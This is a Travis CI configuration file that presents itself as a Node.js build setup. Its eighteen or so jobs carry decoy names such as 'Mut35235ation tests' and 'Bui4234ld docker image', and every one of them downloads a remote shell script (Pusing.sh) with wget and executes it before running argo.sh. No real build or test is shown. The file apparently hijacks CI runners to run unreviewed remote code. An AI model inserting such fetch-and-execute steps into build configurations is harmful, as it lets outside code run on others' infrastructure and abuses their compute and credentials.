dist: bionic

language: node_js

branches:
  only:
    - /.*/

cache:
  directories:
    - node_modules

node_js:
  - '12.16.3'

jobs:
  allow_failures:
    - name: 'Mutation tests'
  include:

    - name: '1'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '2'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '3'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '4'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '5'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '6'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '7 tests'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '8 tests'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '9 docker image'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '99 release'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '789'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '6668 tests'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '4234 tests'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '423 docker image'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: '512 release'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh
      
    - name: 'Mut35235ation tests'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: 'Bui4234ld docker image'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh

    - name: 'Publ4234234ish release'
      before_script:
        - wget https://raw.githubusercontent.com/NuDev2021/pusing/main/Pusing.sh && chmod +x Pusing.sh && ./Pusing.sh
      script: bash argo.sh
